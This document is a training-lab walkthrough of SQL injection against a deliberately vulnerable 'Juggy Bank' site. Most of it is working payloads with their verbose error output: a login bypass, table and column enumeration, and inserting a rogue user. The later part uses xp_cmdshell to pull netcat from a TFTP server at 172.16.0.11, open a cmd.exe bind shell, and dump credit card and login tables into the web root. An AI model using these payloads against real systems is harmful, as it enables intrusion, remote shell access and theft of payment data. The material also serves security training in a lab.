Juggy Bank SQL Injection Lab

First of all, let's work out what database the system is running. On your 2003 Server, open your web browser and type http://localhost/client2.htm. You should see the Juggy Bank web page. In the Login Name box type a single quote ' and press return. This should return an error page showing the database type and the ASP script that ran:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' and password = ''.
    /login.asp, line 5

As can be seen, the back-end database is Microsoft SQL Server, and the application does not handle database errors by redirecting to a generic error page: the raw ODBC error, including the script name (/login.asp) and the line number, is returned to the browser. Every step below relies on that verbose error reporting.

Now let's inject into the Login Name box to bypass the authentication check. In the Login box type

    luke' or 1=1 --

This makes the SQL statement passed to the database

    select * from userinfo where username='luke' or 1=1 -- and password=''

Anything after the -- is ignored as a comment, so the password comparison is never evaluated and the WHERE clause is true for every row. This should log you into the web page as the first user in the table.

Now let's go back to the login screen and try enumerating the table. The first thing we need is the table name. Enter the following in the Login box:

    ' having 1=1 --

This causes the following error:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.username' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    /login.asp, line 5

Notice the information in the error: the table name, userinfo, and the first column name, username. SQL Server names the first column of the select list that is missing from the GROUP BY, so we can walk the columns one at a time. Now we need the next column in the table. Type the following in the Login box:

    ' group by userinfo.username having 1=1 --

This causes the following error:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
    /login.asp, line 5

Now let's try once more, grouping by userinfo.password:

    ' group by userinfo.password having 1=1 --

This time the error names userinfo.username again:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
    /login.asp, line 5

Only username and password are ever reported, which indicates that the userinfo table has exactly these two columns. To confirm it, name both columns in the GROUP BY: once the GROUP BY lists every column in the select list the error disappears and the page falls back to its normal failed-login response.

We must now enumerate the column types:

    ' union select sum(username) from userinfo --

This gives the following error, which indicates the type is varchar (SUM only accepts numeric arguments, so the message leaks the column's real data type):

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
    /login.asp, line 5

And the same for the password column:

    ' union select sum(password) from userinfo --

which is also a varchar.

Now let's create a new user. SQL Server accepts several statements in one batch, so a semicolon lets us append our own statement to the one /login.asp builds; the two values match the two varchar columns found above:

    ' ; insert into userinfo values('john','password')--

Log in with the new user (john / password).

Further Investigation

Now let's get some information on other databases, using the xp_cmdshell extended stored procedure in the master database to run operating-system commands. These commands run with the privileges of the SQL Server service account, and xp_cmdshell does not return until the command exits. Let's put a file on the web server:

    '; exec master..xp_cmdshell "echo I was here on %date% > c:\inetpub\wwwroot\Boo.txt" --

To check that the file is on the server, request Boo.txt from the web root in your browser.

To fetch a file from a TFTP server, e.g. netcat from the 172.16.0.11 server:

    '; exec master..xp_cmdshell 'tftp -i 172.16.0.11 get nc.exe c:\inetpub\wwwroot\nc.exe' --

and then execute it listening on port 9999:

    ';exec master..xp_cmdshell 'c:\inetpub\wwwroot\nc.exe -L -d -e cmd.exe -p 9999' --

You should now be able to telnet to localhost on port 9999 and get a command prompt. Because xp_cmdshell waits for nc.exe to exit, the web request that started the listener will hang; the listener is running regardless.

Now let's dump the credit card details into a text file. osql -E makes a trusted (Windows-authenticated) connection, so it connects back to the database as the same service account xp_cmdshell is running under:

    ';exec master..xp_cmdshell 'osql -E -Q "select * from juggybank..creditcard" -o c:\inetpub\wwwroot\card_details.txt' --

To fetch those details off the web server, request card_details.txt from the web root.

To dump the login details:

    ';exec master..xp_cmdshell 'osql -E -Q "select * from juggybank..userinfo" -o c:\inetpub\wwwroot\logins.txt' --

and request logins.txt from the web root.

Similar commands can be run to mine the system tables: sysdatabases in master lists every database on the instance, and sysobjects with xtype='u' lists the user tables in a database:

    ';exec master..xp_cmdshell 'osql -E -Q "select * from master..sysdatabases" -o c:\inetpub\wwwroot\masterdatabase.txt' --

    ';exec master..xp_cmdshell 'osql -E -Q "select * from juggybank..sysobjects where xtype=''u'' " -o c:\inetpub\wwwroot\juggybanktables.txt' --

In the second statement xtype=''u'' is two sets of single quotes, not a double quote: the osql command is itself a single-quoted T-SQL string literal passed to xp_cmdshell, so every single quote inside it must be doubled, and SQL Server hands osql the command with xtype='u'. Request masterdatabase.txt and juggybanktables.txt from the web root to read the results.

Another way with stored procedures

The above can also be achieved with the sp_makewebtask stored procedure, which writes the result of a query to an HTML file:

    '; exec sp_makewebtask "c:\inetpub\wwwroot\evil.html", "select * from userinfo"; --

Now request evil.html from the web root.
